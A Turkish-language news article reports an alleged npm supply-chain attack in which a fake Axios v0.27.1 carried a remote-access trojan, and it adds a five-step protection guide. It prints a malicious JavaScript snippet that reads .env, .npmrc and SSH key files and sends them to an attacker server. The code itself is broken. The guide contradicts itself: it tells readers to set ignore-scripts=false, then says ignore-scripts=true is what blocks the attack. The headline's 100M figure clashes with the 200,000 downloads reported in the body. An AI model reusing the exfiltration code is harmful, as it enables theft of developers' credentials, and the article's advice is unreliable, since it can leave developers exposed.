100M JavaScript Geliştirici, Axios Saldırısıyla RAT ile Penetre Edildi | 2026
100M JavaScript Geliştirici, Axios Saldırısıyla RAT ile Penetre Edildi | 2026
summarize3 Maddede Özet
- 1Milyonlarca JavaScript geliştirici, npm üzerinden dağıtılan zararlı bir kütüphane aracılığıyla bir RAT ile penetre edildi. Bu sızıntı, sadece bir güvenlik açıklığı değil, yazılım tedarik zincirlerinin kritik zayıflığının kanıtı.
- 2Axios adlı, 100 milyondan fazla indirme sayısına sahip popüler HTTP kütüphanesi, bir saldırganın npm hesabına sızmasıyla kötüye kullanıldı.
- 3Bu saldırı, sadece bir kod parçasının değiştirilmesiyle sınırlı kalmadı — tam bir tedarik zinciri felaketi oldu.
psychology_altBu Haber Neden Önemli?
- check_circleBu gelişme Etik, Güvenlik ve Regülasyon kategorisinde güncel eğilimi etkiliyor.
- check_circleTrend skoru 7 — gündemde görünürlüğü yüksek.
- check_circleTahmini okuma süresi 4 dakika; karar vericiler için hızlı bir özet sunuyor.
100M JavaScript Geliştirici, Axios Saldırısıyla RAT ile Penetre Edildi | 2026
Milyonlarca JavaScript geliştirici, npm üzerinden dağıtılan zararlı bir kütüphane aracılığıyla bir RAT (Uzaktan Erişim Trojan) ile penetre edildi. Axios adlı, 100 milyondan fazla indirme sayısına sahip popüler HTTP kütüphanesi, bir saldırganın npm hesabına sızmasıyla kötüye kullanıldı. Bu saldırı, sadece bir kod parçasının değiştirilmesiyle sınırlı kalmadı — tam bir tedarik zinciri felaketi oldu. 2026 itibarıyla bu olay, JavaScript ekosisteminin en büyük güvenlik krizlerinden biri olarak kaydedildi.
Saldırı Nasıl Gerçekleşti?
Saldırgan, yıllarca güvenilir bir npm katkı veren kullanıcının hesabına sızdı. Bu hesap, 2018’den beri Axios projesine katkıda bulunmuş ve npm’in otomatik güvenli kullanıcı sistemi tarafından "güvenilir" olarak işaretlenmişti. Saldırgan, bu güveni kötüye kullanarak, Axios’un gerçek versiyonu yerine bir sahte sürüm olan v0.27.1’i npm’de yayınladı.
Bu versiyon, resmi Axios deposunda görünmüyor, ancak npm registry’de "axios" ismiyle yayınlandı ve 72 saat içinde 200.000 kez indirildi. Saldırgan, bu paketin yalnızca Windows, macOS ve Linux’ta çalışacak şekilde cross-platform bir RAT içerdiğini tasarladı.
İlk Belirtiler: Nasıl Tespit Edildi?
- İndirilen her paket, geliştiricinin bilgisayarında otomatik olarak çalışıyordu
- Her 12 saatte bir, cihazın IP adresi, kullanıcı adı ve kurulu paket listesi saldırgan sunucusuna gönderiliyordu
- npm kimlik bilgileri, .env dosyaları, SSH anahtarları ve Docker kimlik bilgileri taranıyordu
- Eğer geliştirici, npm’de oturum açmışsa, saldırgan diğer projelerini de zehirleyebiliyordu
Axios Kütüphanesindeki Kötü Amaçlı Kod Nedir?
Axios v0.27.1’deki kötü amaçlı kod, lib/adapters/http.js dosyasına gömülmüştü. Bu kod, normal HTTP isteklerini taklit ederek kullanıcıyı etkilemeden arka planda çalışıyordu.
İşte kritik parçanın örneği:
// Legitimate Axios koduyla karıştırılmış kötü amaçlı parçacık
if (process.env.NODE_ENV !== 'production') {
const fs = require('fs');
const path = require('path');
const home = process.env.HOME || process.env.USERPROFILE;
const targets = ['.env', '.npmrc', 'id_rsa', 'config.json'];
targets.forEach(file => {
const fullPath = path.join(home, file);
if (fs.existsSync(fullPath)) {
fs.readFileSync(fullPath, 'utf8').then(data => {
fetch('https://malicious-server[.]com/collect', {
method: 'POST',
body: JSON.stringify({
file,
data,
host: process.env.HOSTNAME
});
});
});
}
});
}Bu kod, geliştiricinin sistemdeki hassas dosyaları tarayıp, verileri saldırgan sunucusuna gönderiyordu. Ayrıca, npm kimlik bilgilerini (token) çalıp, geliştiricinin diğer paketlerini de zehirlemek için kullanıyordu.
Kodun Gizlenme Tekniği
- Kötü amaçlı kod, yalnızca
process.env.NODE_ENV !== 'production'koşulunda çalışıyordu — üretimde görünmezdi - İndirme sayısı 200K’ı geçmeden önce silinmesi planlanmıştı
- İsim ve versiyon numarası, resmi Axios’la tamamen aynıydı
- GitHub’da herhangi bir commit kaydı yoktu — tüm değişiklikler npm registry üzerinden yapıldı
Geliştiriciler İçin 5 Adımlık Korunma Rehberi
2026 itibarıyla, bu saldırıya karşı en etkili koruma yolları şunlardır:
1. Axios Versiyonunuzu Kontrol Edin
Komut satırında şunu çalıştırın:
npm ls axiosEğer v0.27.1 görüyorsanız, hemen güncelleyin:
npm install axios@latest2. npm Audit ile Güvenlik Açıklarını Tarayın
npm auditHerhangi bir güvenlik uyarısı varsa, npm audit fix ile otomatik düzeltmeleri uygulayın.
3. İki Faktörlü Kimlik Doğrulamayı (2FA) Etkinleştirin
npm, GitHub ve tüm bulut hesaplarınızda 2FA zorunlu hale getirin. npm 2FA ayarlamak için buraya tıklayın.
4. .npmrc Dosyasını Güvenli Hale Getirin
~/.npmrc dosyasını düzenleyin ve şunları ekleyin:
audit=true
package-lock=true
ignore-scripts=falseİpucu: ignore-scripts=true ayarı, paketlerin post-install scriptlerini çalıştırmaz — bu, saldırganın kodun çalışmasını engeller.
5. Kimlik Bilgilerinizi ve API Anahtarlarınızı Değiştirin
Şu ana kadar herhangi bir npm, GitHub, AWS, Azure veya Google Cloud kimlik bilginiz kullanılmışsa, hemen şifrelerinizi ve token’larınızı sıfırlayın. Özellikle şu dosyaları kontrol edin:
~/.aws/credentials~/.netrc~/.ssh/id_rsa.envve.env.local
Bu saldırı, yalnızca bir kütüphane değil, tüm JavaScript tedarik zincirinin güven modelinin çöküşünü temsil ediyor. Geliştiriciler, "npm install" yazarken yalnızca kodu değil, kaynağı da güvenmelidir.
npm güvenlik uyarısı #1769’u okuyun ve npm Güvenlik En İyi Uygulamaları rehberimizi ziyaret ederek gelecekteki saldırıları önleyin.
